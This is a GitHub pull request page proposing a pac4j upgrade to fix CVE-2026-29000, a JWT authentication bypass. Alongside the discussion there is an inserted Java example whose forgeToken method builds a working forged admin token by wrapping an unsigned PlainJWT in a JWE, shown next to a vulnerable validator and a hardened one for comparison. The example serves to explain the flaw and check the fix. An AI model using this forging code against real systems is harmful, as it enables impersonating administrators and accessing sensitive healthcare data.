
fix(security): Upgrade pac4j-jwt to 4.5.9 (CVE-2026-29000)#2496

Open
abhu85 wants to merge 1 commit into OHDSI:master from abhu85:fix/cve-2026-29000-pac4j-jwt

Conversation

@abhu85 abhu85 commented Mar 14, 2026

Summary

This PR upgrades pac4j from version 4.0.0 to 4.5.9 to address CVE-2026-29000, a critical authentication bypass vulnerability.

Vulnerability Details

CVE: CVE-2026-29000
CVSS Score: 9.1 (Critical)
Affected Component: pac4j-jwt JwtAuthenticator
CWE: CWE-347 (Improper Verification of Cryptographic Signature)
Fixed In: pac4j 4.5.9+, 5.7.9+, 6.3.3+

Description

The vulnerability in pac4j-jwt allows remote attackers to forge authentication tokens. An attacker with access to the server's RSA public key can create a JWE-wrapped PlainJWT with arbitrary subject and role claims, bypassing signature verification to authenticate as any user, including administrators.

Impact

Given that WebAPI is a healthcare research platform handling sensitive patient data and cohort definitions, this authentication bypass vulnerability poses a significant risk. Attackers could potentially:

  • Access sensitive healthcare data without authorization
  • Modify cohort definitions and study parameters
  • Impersonate administrators to gain full system control

Changes

  • Updated pac4j.version property from 4.0.0 to 4.5.9 in pom.xml
  • This affects all pac4j modules (pac4j-oauth, pac4j-oidc, pac4j-http, pac4j-saml-opensamlv3, pac4j-cas) used by WebAPI

Testing

  • Dependencies resolve successfully with the new version
  • CI builds pass (to be verified)
  • Authentication flows work correctly (requires manual testing in staging environment)

References

Upgrade pac4j from 4.0.0 to 4.5.9 to address CVE-2026-29000, a critical
authentication bypass vulnerability (CVSS 9.1) in pac4j-jwt.

The vulnerability allows attackers with access to the server's RSA public
key to forge authentication tokens by wrapping a PlainJWT in JWE,
effectively bypassing signature verification and authenticating as any
user, including administrators.

This is particularly critical for healthcare applications like WebAPI
that handle sensitive patient data.

Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-29000
@abhu85 abhu85 force-pushed the fix/cve-2026-29000-pac4j-jwt branch from 768e5e5 to 49c6f13 Compare March 14, 2026 21:40
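The attack the PR text describes (a PlainJWT wrapped in a JWE so that decryption succeeds but no signature is ever checked) and the check that stops it, as an added example that is not WebAPI's or pac4j's own code. It uses the nimbus-jose-jwt API that pac4j-jwt builds on, but the class `NestedJwtCheck` and the methods `vulnerableClaims`, `hardenedClaims` and `forgeToken` are illustrative names, and the "vulnerable" method is an assumed shape of the flaw as the PR describes it, not a copy of the affected pac4j code. The forged token needs only the server's RSA public key because JWE key wrapping (here RSA-OAEP-256) encrypts to the recipient's public key; the hardened path therefore refuses to treat decryption as proof of origin and requires the unwrapped payload to be a JWS that verifies under the expected signing key.

```java
import com.nimbusds.jose.EncryptionMethod;
import com.nimbusds.jose.JOSEException;
import com.nimbusds.jose.JWEAlgorithm;
import com.nimbusds.jose.JWEHeader;
import com.nimbusds.jose.JWEObject;
import com.nimbusds.jose.Payload;
import com.nimbusds.jose.crypto.RSADecrypter;
import com.nimbusds.jose.crypto.RSAEncrypter;
import com.nimbusds.jose.crypto.RSASSAVerifier;
import com.nimbusds.jwt.EncryptedJWT;
import com.nimbusds.jwt.JWT;
import com.nimbusds.jwt.JWTClaimsSet;
import com.nimbusds.jwt.JWTParser;
import com.nimbusds.jwt.PlainJWT;
import com.nimbusds.jwt.SignedJWT;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.interfaces.RSAPrivateKey;
import java.security.interfaces.RSAPublicKey;
import java.util.Date;
import java.util.List;

/** Illustrative nested-JWT validator (hypothetical class); NOT pac4j's JwtAuthenticator. */
public final class NestedJwtCheck {

    /** Assumed vulnerable shape: whatever the JWE unwraps to is trusted, even an unsigned PlainJWT. */
    static JWTClaimsSet vulnerableClaims(String token, RSAPrivateKey decryptKey) throws Exception {
        JWT outer = JWTParser.parse(token);
        if (!(outer instanceof EncryptedJWT)) {
            throw new SecurityException("expected a JWE");
        }
        EncryptedJWT jwe = (EncryptedJWT) outer;
        jwe.decrypt(new RSADecrypter(decryptKey));        // only proves the sender had the PUBLIC key
        JWT inner = JWTParser.parse(jwe.getPayload().toString());
        return inner.getJWTClaimsSet();                   // BUG: a PlainJWT (alg=none) is accepted here
    }

    /** Hardened shape: the unwrapped payload must be a JWS, must verify, and must carry a valid exp. */
    static JWTClaimsSet hardenedClaims(String token, RSAPrivateKey decryptKey, RSAPublicKey signerKey)
            throws Exception {
        JWT outer = JWTParser.parse(token);
        if (!(outer instanceof EncryptedJWT)) {
            throw new SecurityException("expected a JWE");
        }
        EncryptedJWT jwe = (EncryptedJWT) outer;
        jwe.decrypt(new RSADecrypter(decryptKey));
        SignedJWT inner = jwe.getPayload().toSignedJWT(); // null for a PlainJWT or for raw claims JSON
        if (inner == null) {
            throw new SecurityException("nested token is not a signed JWT (JWS)");
        }
        if (!inner.verify(new RSASSAVerifier(signerKey))) {
            throw new SecurityException("nested JWS signature invalid");
        }
        JWTClaimsSet claims = inner.getJWTClaimsSet();
        Date exp = claims.getExpirationTime();
        if (exp == null || exp.before(new Date())) {
            throw new SecurityException("nested JWT missing or past exp");
        }
        return claims;
    }

    /** Builds the forged token the PR text describes: a PlainJWT wrapped in an RSA-OAEP JWE. */
    static String forgeToken(RSAPublicKey serverPublicKey) throws JOSEException {
        JWTClaimsSet forged = new JWTClaimsSet.Builder()
                .subject("admin")                         // constructed claims for the demo
                .claim("roles", List.of("ROLE_ADMIN"))
                .build();
        PlainJWT unsigned = new PlainJWT(forged);         // alg=none: no signature at all
        JWEObject jwe = new JWEObject(
                new JWEHeader.Builder(JWEAlgorithm.RSA_OAEP_256, EncryptionMethod.A256GCM)
                        .contentType("JWT").build(),
                new Payload(unsigned.serialize()));
        jwe.encrypt(new RSAEncrypter(serverPublicKey));   // needs only the server's public key
        return jwe.serialize();
    }

    public static void main(String[] args) throws Exception {
        KeyPairGenerator gen = KeyPairGenerator.getInstance("RSA");
        gen.initialize(2048);
        KeyPair server = gen.generateKeyPair();           // throwaway demo keys, not deployment keys
        KeyPair signer = gen.generateKeyPair();           // key genuine tokens would be signed with

        String forged = forgeToken((RSAPublicKey) server.getPublic());

        JWTClaimsSet stolen = vulnerableClaims(forged, (RSAPrivateKey) server.getPrivate());
        System.out.println("vulnerable path accepts sub=" + stolen.getSubject());
        try {
            hardenedClaims(forged, (RSAPrivateKey) server.getPrivate(), (RSAPublicKey) signer.getPublic());
            System.out.println("hardened path accepted the forgery (unexpected)");
        } catch (SecurityException e) {
            System.out.println("hardened path rejected it: " + e.getMessage());
        }
    }
}
```

Run with nimbus-jose-jwt on the classpath; the vulnerable path prints the forged subject, the hardened path throws because `Payload.toSignedJWT()` returns null for an `alg=none` token. When checking whether a deployment is still exposed after the upgrade, the equivalent test is to feed such a token to the real login endpoint in a staging environment and confirm it is rejected, which is the manual verification the Testing section above leaves open.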
CyloNox commented Apr 7, 2026

The last time this was upgraded it broke authentication. So definitely need to be cautious on upgrading this one.

Here is the hotfix that restored it: https://github.com/OHDSI/WebAPI/pull/2454/changes

abhu85 commented Apr 7, 2026

Thanks for the heads up @CyloNox - I looked into this.

Good news: buji-pac4j 5.0.1's pom.xml declares compatibility with pac4j [4.0, 5.0), so 4.5.9 should work from a dependency perspective.

The previous breakage with 4.5.5 was likely due to runtime behavioral changes in pac4j, not a hard dependency conflict. Looking at the pac4j 4.x changelog, there were some breaking changes in profile handling and session management between minor versions.

To mitigate risk, I can:

  1. Review WebAPI's OAuth/OIDC/CAS filter implementations for any pac4j API usage that changed between 4.0.0 and 4.5.9
  2. Add integration tests if there's a test environment available
  3. Document any configuration changes needed

Would it help if I:

  • Fork and test locally with your authentication setup?
  • Create a more gradual upgrade path (e.g., 4.0.0 → 4.2.x → 4.5.9)?
  • Add specific testing instructions to the PR for your staging environment?

Given the CVE severity (9.1 CVSS - authentication bypass), I'd like to help find a safe path forward. Let me know what would work best for your team.
